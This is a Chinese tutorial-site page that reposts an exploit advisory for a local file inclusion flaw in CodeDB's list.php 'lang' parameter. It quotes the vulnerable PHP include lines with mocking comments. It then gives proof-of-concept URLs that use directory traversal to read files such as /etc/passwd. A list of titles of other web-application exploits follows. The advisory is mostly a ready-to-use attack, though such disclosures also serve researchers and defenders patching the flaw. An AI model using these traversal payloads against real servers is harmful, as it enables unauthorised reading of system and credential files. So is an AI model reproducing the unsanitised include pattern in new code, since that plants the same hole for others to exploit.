首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >Exploit >CodeDB (list.php lang) Local File Inclusion Vulnerability
CodeDB (list.php lang) Local File Inclusion Vulnerability
摘要:######################################################################...

###############################################################################

#

# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability

# Author : cOndemned

# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*

#

###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension

8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt

http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd

http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.

【CodeDB (list.php lang) Local File Inclusion Vulnerability】相关文章:

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

Maian Music 1.0 Insecure Cookie Handling Vulnerability

上一篇: Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新Exploit学习
热门Exploit学习